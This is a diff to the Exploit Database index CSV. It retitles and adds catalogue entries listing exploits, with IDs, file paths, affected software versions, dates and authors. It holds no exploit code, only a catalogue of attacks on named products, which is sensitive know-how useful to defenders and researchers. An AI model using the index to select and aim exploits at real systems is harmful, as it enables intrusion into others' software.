 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0
 20062,platforms/php/webapps/20062.py,"Alienvault OSSIM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0
-20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection",2012-07-23,dookie,windows,webapps,0
+20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,windows,webapps,0
 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Root Remote Code Execution) Exploit",2012-07-24,muts,linux,remote,0
 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0
 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0
@@ -17430,7 +17429,7 @@ id,file,description,date,author,platform,type,port
 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - Denial of Service",2000-07-18,wildcoyote,windows,dos,0
 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0
 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,unix,remote,0
-20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0
+20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary .PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0
 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 - Piped Command",2000-07-18,Prizm,cgi,remote,0
 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0
 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0
@@ -17509,7 +17508,7 @@ id,file,description,date,author,platform,type,port
 20170,platforms/php/webapps/20170.txt,"Joomla Movm Extension (com_movm) - SQL Injection",2012-08-01,D4NB4R,php,webapps,0
 20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0
 20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0
-20173,platforms/php/webapps/20173.rb,"WebPageTest - Arbitrary PHP File Upload",2012-08-02,Metasploit,php,webapps,0
+20173,platforms/php/webapps/20173.rb,"WebPageTest - Arbitrary .PHP File Upload",2012-08-02,Metasploit,php,webapps,0
 20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow",2012-08-02,Metasploit,windows,remote,0
 20175,platforms/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",windows,dos,0
 20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0
@@ -17997,7 +17996,7 @@ id,file,description,date,author,platform,type,port
 20671,platforms/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps,0
 20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0
 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - (index.php id Parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0
-20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload",2012-08-22,Metasploit,php,webapps,0
+20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary .PHP File Upload",2012-08-22,Metasploit,php,webapps,0
 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",php,webapps,0
 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0
 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0
@@ -18168,7 +18167,7 @@ id,file,description,date,author,platform,type,port
 20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows - Kernel Intel x64 SYSRET (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0
 20862,platforms/php/webapps/20862.txt,"WordPress Count per Day Plugin 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0
 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0
-20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0
+20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps,0
 20865,platforms/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution",2012-08-27,Metasploit,java,remote,0
 20866,platforms/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0
 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0
@@ -18824,7 +18823,7 @@ id,file,description,date,author,platform,type,port
 21543,platforms/java/webapps/21543.txt,"Ruslan Communications <Body>Builder - SQL Injection",2002-06-13,"Alexander Korchagin",java,webapps,0
 21544,platforms/multiple/dos/21544.html,"Netscape 4.77 - Composer Font Face Field Buffer Overflow",2002-06-13,S[h]iff,multiple,dos,0
 21545,platforms/jsp/webapps/21545.txt,"JAMF Casper Suite MDM - Cross-Site Request Forgery",2012-09-27,"Jacob Holcomb",jsp,webapps,0
-21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection",2012-09-27,otoy,windows,webapps,0
+21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection",2012-09-27,otoy,windows,webapps,0
 21547,platforms/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC - Privilege Escalation",2012-09-27,X-Cisadane,windows,local,0
 21548,platforms/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote,0
 21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0
@@ -18853,7 +18852,8 @@ id,file,description,date,author,platform,type,port
 21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 - New Player Flood Denial of Service",2002-06-20,"Auriemma Luigi",multiple,dos,0
 21573,platforms/cgi/webapps/21573.txt,"YaBB 1 - Invalid Topic Error Page Cross-Site Scripting",2002-06-21,methodic,cgi,webapps,0
 21574,platforms/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",unix,remote,0
-21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0
+21575,platforms/multiple/dos/21575.txt,"Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0
+40348,platforms/windows/local/40348.py,"Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
 21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - ext.dll Cross-Site Scripting",2002-06-23,"Matthew Murphy",windows,remote,0
 21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0
 21578,platforms/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",unix,remote,0
@@ -18947,8 +18947,8 @@ id,file,description,date,author,platform,type,port
 21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 - Form Field HTML Injection",2002-07-29,delusion,php,webapps,0
 21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
-21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1)",2002-07-30,spabam,unix,remote,0
-21672,platforms/unix/remote/21672.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2)",2002-07-30,spabam,unix,remote,0
+21671,platforms/unix/remote/21671.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
+40347,platforms/unix/remote/40347.txt,"Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
 21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
 21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
 21675,platforms/windows/remote/21675.pl,"Trillian 0.x - IRC Module Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
@@ -19109,7 +19109,7 @@ id,file,description,date,author,platform,type,port
 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,php,webapps,0
 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0
-21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,Metasploit,php,webapps,0
+21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary .PHP File Upload",2012-10-10,Metasploit,php,webapps,0
 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload",2012-10-10,Metasploit,linux,webapps,0
 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution",2012-10-10,Metasploit,windows,remote,4322
 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter - Buffer Overflow",2012-10-10,Metasploit,windows,remote,3217
@@ -19332,7 +19332,7 @@ id,file,description,date,author,platform,type,port
 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0
 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0
 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
-22069,platforms/multiple/local/22069.py,"Oracle Database - Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
+22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol  Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0
 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0
 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
@@ -19760,9 +19760,9 @@ id,file,description,date,author,platform,type,port
 22508,platforms/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x - Rejected Connection Memory Leakage Denial of Service",2003-04-18,"Steve Grubb",linux,dos,0
 22509,platforms/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",multiple,remote,0
 22511,platforms/windows/remote/22511.txt,"Working Resources 1.7.x/2.15 BadBlue - ext.dll Command Execution",2003-04-20,"Matthew Murphy",windows,remote,0
-22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorization Heap Overflow",2003-04-21,"Matthew Murphy",multiple,dos,0
+22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorisation Heap Overflow",2003-04-21,"Matthew Murphy",multiple,dos,0
 22513,platforms/asp/webapps/22513.txt,"MPCSoftWeb 1.0 - Database Disclosure",2003-04-21,drG4njubas,asp,webapps,0
-22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorization Format String",2003-04-21,"Matthew Murphy",multiple,dos,0
+22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorisation Format String",2003-04-21,"Matthew Murphy",multiple,dos,0
 22515,platforms/windows/remote/22515.txt,"AN HTTPD 1.x - Count.pl Directory Traversal",2003-04-22,"Matthew Murphy",windows,remote,0
 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0
 22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 - 'index.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0
@@ -19921,7 +19921,7 @@ id,file,description,date,author,platform,type,port
 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,php,webapps,0
 22673,platforms/asp/webapps/22673.txt,"philboard 1.14 - philboard_admin.asp Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps,0
 22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Full Path Disclosure",2003-05-29,JeiAr,windows,remote,0
-22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authentication SQL Injection",2003-05-29,pokleyzz,php,webapps,0
+22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,php,webapps,0
 22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0
 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0
 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0
@@ -20029,7 +20029,7 @@ id,file,description,date,author,platform,type,port
 22784,platforms/windows/remote/22784.txt,"Microsoft Internet Explorer 5 - Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote,0
 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0
 22786,platforms/linux/remote/22786.c,"Dune 0.6.7 - HTTP Get Remote Buffer Overrun",2003-06-17,V9,linux,remote,0
-22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution",2012-11-19,Metasploit,windows,remote,0
+22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution",2012-11-19,Metasploit,windows,remote,0
 22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,windows,dos,0
 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0
 22790,platforms/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0
@@ -20169,7 +20169,7 @@ id,file,description,date,author,platform,type,port
 22951,platforms/windows/remote/22951.html,"Opera 7.20 - Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",windows,remote,0
 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0
 22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 - Information Disclosure",2003-07-24,"Jim Pangalos",php,webapps,0
-22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution",2003-07-24,"Martin Eiszner",php,webapps,0
+22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution",2003-07-24,"Martin Eiszner",php,webapps,0
 22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 - db.php Information Disclosure",2003-07-24,"Artoor Petrovich",php,webapps,0
 22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service",2003-07-23,refdom,windows,dos,0
 22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",php,webapps,0
@@ -20312,7 +20312,7 @@ id,file,description,date,author,platform,type,port
 23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,linux,dos,0
 23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
 23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
-23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Pre-Authentication User Enumeration",2012-12-02,kingcope,multiple,remote,0
+23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0
 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0
 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0
 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0
@@ -20368,7 +20368,7 @@ id,file,description,date,author,platform,type,port
 23137,platforms/multiple/remote/23137.txt,"Cacheflow CacheOS 4.1.10016 - HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote,0
 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow",2003-09-10,"Frank DENIS",linux,dos,0
 23139,platforms/windows/dos/23139.txt,"myServer 0.4.x - cgi-lib.dll Remote Buffer Overflow",2003-09-12,Moran,windows,dos,0
-23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authentication SQL Injection",2003-09-12,frog,php,webapps,0
+23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection",2003-09-12,frog,php,webapps,0
 23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass",2003-09-15,Texonet,sco,local,0
 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 - HTTP Request Buffer Overflow",2003-09-15,"Bahaa Naamneh",multiple,dos,0
 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,sco,local,0
@@ -20656,9 +20656,9 @@ id,file,description,date,author,platform,type,port
 23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",cgi,webapps,0
 23433,platforms/multiple/remote/23433.txt,"Mozilla Browser 1.5 - URI MouseOver Obfuscation",2003-12-11,netmask,multiple,remote,0
 23434,platforms/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps,0
-23435,platforms/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1)",2003-12-16,Adik,windows,remote,0
-23436,platforms/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (2)",2003-12-16,kralor,windows,remote,0
-23437,platforms/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (3)",2003-12-16,kralor,windows,remote,0
+23435,platforms/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1)",2003-12-16,Adik,windows,remote,0
+23436,platforms/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2)",2003-12-16,kralor,windows,remote,0
+23437,platforms/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3)",2003-12-16,kralor,windows,remote,0
 23438,platforms/linux/dos/23438.pl,"X-Chat 2.0.6 - Remote Denial of Service",2003-12-15,"Stefan Hecker",linux,dos,0
 23439,platforms/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server - Download Buffer Overrun",2003-12-15,"Oscar Linderholm",multiple,remote,0
 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0
@@ -20868,8 +20868,8 @@ id,file,description,date,author,platform,type,port
 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0
 23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution",2012-12-25,Metasploit,windows,remote,0
 23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection",2012-12-25,Metasploit,windows,remote,0
-23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0
-23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0
+23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - Arbitrary .PHP File Upload",2012-12-25,Metasploit,php,remote,0
+23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - Arbitrary .PHP File Upload",2012-12-25,Metasploit,php,remote,0
 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
 23654,platforms/windows/dos/23654.txt,"XLight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0
 23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0
@@ -20941,7 +20941,7 @@ id,file,description,date,author,platform,type,port
 23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote,0
 23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0
 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0
-23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution",2012-12-29,xistence,hardware,remote,0
+23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution",2012-12-29,xistence,hardware,remote,0
 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0
 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0
 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0
@@ -20956,7 +20956,7 @@ id,file,description,date,author,platform,type,port
 23747,platforms/php/webapps/23747.txt,"XMB Forum 1.8 - BBcode align Tag Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0
 23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 - forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0
 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",php,webapps,0
-23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0
+23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0
 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote,0
 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos,0
 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",php,webapps,0
@@ -20995,8 +20995,8 @@ id,file,description,date,author,platform,type,port
 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free",2013-01-02,Metasploit,windows,remote,0
 23786,platforms/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series - Denial of Service",2004-03-02,"Alex Hernandez",hardware,dos,0
 23787,platforms/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow",2004-03-02,JeFFOsZ,multiple,dos,0
-23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0
-23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos,0
+23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0
+23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos,0
 23790,platforms/windows/remote/23790.htm,"Microsoft Internet Explorer 5 - window.open Search Pane Cross-Zone Scripting",2003-09-10,"Liu Die Yu",windows,remote,0
 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0
 23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0
@@ -21220,7 +21220,7 @@ id,file,description,date,author,platform,type,port
 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution",2013-01-10,Metasploit,windows,remote,0
 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos,0
 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0
-24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0
+24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0
 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0
 24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0
 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0
@@ -21357,7 +21357,7 @@ id,file,description,date,author,platform,type,port
